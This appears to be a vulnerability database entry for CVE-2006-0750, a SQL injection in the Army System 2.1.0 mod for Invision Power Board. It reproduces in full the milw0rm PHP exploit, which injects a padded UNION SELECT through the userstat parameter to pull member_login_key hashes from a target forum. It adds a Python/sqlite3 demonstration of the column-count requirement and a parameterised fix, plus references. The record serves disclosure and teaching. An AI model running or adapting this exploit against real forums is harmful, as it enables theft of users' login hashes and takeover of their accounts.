IPB Army System army.php SQL Injection Vulnerability

Vulnerability ID: 1109745    Type: SQL injection
Published: 2006-02-13    Updated: 2007-09-04
CVE: CVE-2006-0750    CNNVD-ID: CNNVD-200602-257
Platform: PHP    CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/1492
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200602-257
|Vulnerability Details
A SQL injection vulnerability exists in army.php of the supersmashbrothers (SSB) Army System 2.1.0 mod for Invision Power Board (IPB). The userstat parameter of the army action (index.php?act=army) is placed directly into a query, so a remote attacker can execute arbitrary SQL commands, for example a UNION SELECT that reads member_login_key from the members table.
|Exploit
<?php
/* --------------------------- EXPLOIT ---------------------------
Invision Power Board Army System Mod 2.1 SQL Injection Exploit
Tested on: Latest version (2.1.0)
Discovered on: 06.02.2006 by Alex & fRoGGz
Credits to: SecuBox Labs

PLEASE READ THIS !
The query used for the SQL injection depends on the number of fields (columns) in the SQL table
We have successfully tested the exploit on a fresh IPB 2.1.x with Army
System Mod 2.1 installed

IN NO EVENT SHALL THE OWNER OF THIS CODE OR CONTRIBUTORS BE LIABLE 
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

$target = "http://site.com/forums/"; // <--- Where ?
$prefix = "ibf_"; // <--- SQL prefix ?
$id = 1; // <--- Who ?

// Run the injection once and report the result
$infos = get_infos($target,$prefix,$id);
if ($infos) print_r($infos);
else echo "failed";

function get_infos($target,$prefix,$id) {

    // userstat=0 matches no army row, so the only row returned is the UNIONed
    // member row. The UNION must have as many columns as the mod's own SELECT,
    // hence the padding with 1s and NULLs; member_login_key ends up in the
    // cell the page renders next to the "Name" label.
    $inject = "index.php?s=&act=army&userstat=0+UNION+SELECT+id,member_login_key,";
    $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,";
    $inject.= "1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,NULL,NULL,";
    $inject.= "NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,";
    $inject.= "NULL+FROM+".$prefix."members+WHERE+id=";

    $filename = $target . $inject . $id;

    // Fetch the injected page over HTTP (requires allow_url_fopen)
    $handle = @fopen ($filename, "r");
    $infos = array();

    if ( $handle ) {
        while ( ($buffer = fgets( $handle )) !== false )
        {
            // The leaked member_login_key is rendered in the cell after the "Name" label
            if ( strpos( $buffer, "<td class='pformleft' width=\"35%\">Name</td>") !== false ) {
                $infos['md5'] = trim( strip_tags ( fgets( $handle) ) );
                break;
            }
        }
        fclose ($handle);
    }

        if (count($infos) == 1) return $infos;
        return false;
}
?>

# milw0rm.com [2006-02-13]
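The point made in the details above and in the exploit's own header, that the injected UNION only works when it produces exactly as many columns as the query it is spliced into, is easiest to see against a small model. The following Python/sqlite3 script is an added example, not code from the advisory, the exploit authors or the Army System mod: the `ibf_army` and `ibf_members` layouts, the three-column width, the row contents and the placeholder login-key hash are all constructed here, and `lookup_vulnerable`, `lookup_fixed`, `union_payload` and `leak_login_key` are hypothetical names. It shows the unparameterised lookup leaking `member_login_key` only when the padding gives the right column count, and a bound-parameter version returning nothing for the same payload.

```python
import sqlite3

# Added example, not code from the advisory or from the Army System mod.
# Everything here is constructed: the table prefix and the two table layouts
# stand in for the IPB schema, and the login key is a placeholder hash.
PREFIX = "ibf_"
FAKE_LOGIN_KEY = "e99a18c428cb38d5f260853678922e03"


def build_db():
    """In-memory stand-in for the forum database."""
    conn = sqlite3.connect(":memory:")
    # Hypothetical 3-column stats table in place of the mod's own table.
    conn.execute(f"CREATE TABLE {PREFIX}army (id INTEGER, name TEXT, rank TEXT)")
    conn.execute(f"INSERT INTO {PREFIX}army VALUES (1, 'alice_army', 'general')")
    # The real target of the exploit: member rows holding the login-key hash.
    conn.execute(
        f"CREATE TABLE {PREFIX}members (id INTEGER, name TEXT, member_login_key TEXT)"
    )
    conn.execute(f"INSERT INTO {PREFIX}members VALUES (1, 'admin', '{FAKE_LOGIN_KEY}')")
    conn.commit()
    return conn


def lookup_vulnerable(conn, userstat):
    """The flaw: the request parameter is spliced straight into the SQL text."""
    sql = f"SELECT id, name, rank FROM {PREFIX}army WHERE id={userstat}"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, userstat):
    """Hardened form: a bound parameter cannot change the shape of the query."""
    sql = f"SELECT id, name, rank FROM {PREFIX}army WHERE id=?"
    return conn.execute(sql, (userstat,)).fetchall()


def union_payload(columns, target_id=1):
    """Build a userstat value in the exploit's style: id and member_login_key
    first, then literal 1s so the UNION has exactly `columns` result columns."""
    selected = ["id", "member_login_key"] + ["1"] * (columns - 2)
    return (
        "0 UNION SELECT " + ",".join(selected)
        + f" FROM {PREFIX}members WHERE id={target_id}"
    )


def leak_login_key(conn, columns):
    """Run the injected query through the vulnerable lookup. Returns the leaked
    hash, or None when the database rejects the UNION because the column
    count does not match (the point the exploit's header warns about)."""
    try:
        rows = lookup_vulnerable(conn, union_payload(columns))
    except sqlite3.OperationalError:
        return None
    # id=0 matches no army row, so the only row returned is the UNIONed member
    # row; its second column is member_login_key sitting where 'name' would be.
    return rows[0][1] if rows else None


if __name__ == "__main__":
    db = build_db()
    for width in (2, 3, 4):
        print(width, "columns ->", leak_login_key(db, width))
    print("fixed lookup with payload ->", lookup_fixed(db, union_payload(3)))
```

Only the three-column payload leaks the hash; the two- and four-column variants fail the way a mismatched padding string would fail against the real mod, which is why the exploit hard-codes the width it was tested against. On MySQL the equivalent failure is error 1222, "The used SELECT statements have a different number of columns"; sqlite3 raises OperationalError instead, which the example catches. The fix is the same in any language: bind the value (or cast it to an integer) rather than concatenating it into the query.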
|References

Source: XF
Name: ipb-armysystem-sql-injection(24654)
Link: http://xforce.iss.net/xforce/xfdb/24654
Source: BID
Name: 16606
Link: http://www.securityfocus.com/bid/16606
Source: BUGTRAQ
Name: 20060212 Invision Power Board Army System Mod <= 2.1 SQL Injection Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/424846/100/0/threaded
Source: VUPEN
Name: ADV-2006-0561
Link: http://www.frsirt.com/english/advisories/2006/0561
Source: SECUNIA
Name: 18840
Link: http://secunia.com/advisories/18840
Source: MISC
Link: http://secubox.shadock.net/Invision_Power_Board_Army_System_Mod_2.1_and_prior_SQL_Injection_Exploit.html